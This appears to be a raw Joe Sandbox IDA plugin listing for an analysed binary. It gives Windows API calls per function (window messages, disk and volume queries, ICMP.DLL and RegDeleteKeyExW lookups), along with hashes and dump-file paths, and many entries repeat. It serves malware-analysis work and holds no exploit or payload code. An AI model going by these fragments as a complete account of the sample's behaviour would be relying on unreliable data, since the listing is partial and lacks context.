                                                                        • String ID: 0
                                                                        • API String ID: 135850232-4108050209
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2326795674-1439706946
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: DestroyWindow
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 3375834691-2298589950
                                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: $<
                                                                        • API String ID: 4104443479-428540627
                                                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID: \VH
                                                                        • API String ID: 1682464887-234962358
                                                                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2507767853-234962358
                                                                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2507767853-234962358
                                                                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 3850602802-1010561917
                                                                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                        • String ID: crts
                                                                        • API String ID: 943502515-3724388283
                                                                        • Opcode ID: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                                                                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                        • Opcode Fuzzy Hash: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                                                                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$LabelVolume
                                                                        • String ID: \VH
                                                                        • API String ID: 2006950084-234962358
                                                                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetMenuItemInfoW.USER32 ref: 00449727
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
• DrawMenuBar.USER32 ref: 00449761
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
• Opcode ID: 08c999079c9288da8331d921eb98ebfa6b916f44b48ff73f34ad091df02caad3
• Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
• Opcode Fuzzy Hash: 08c999079c9288da8331d921eb98ebfa6b916f44b48ff73f34ad091df02caad3
• Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: _wcslen$_wcscpy
• String ID: 3, 3, 8, 1
• API String ID: 3469035223-357260408
• Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
• Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
• Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
• Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
• Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
• Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
• Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
• Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
• Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
• Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
• Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
• Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
• Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
• Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
• Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
• Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
APIs
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
• Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
• Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
• Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
APIs
• SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
• __itow.LIBCMT ref: 004699CD
  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
• SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
• __itow.LIBCMT ref: 00469A97
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
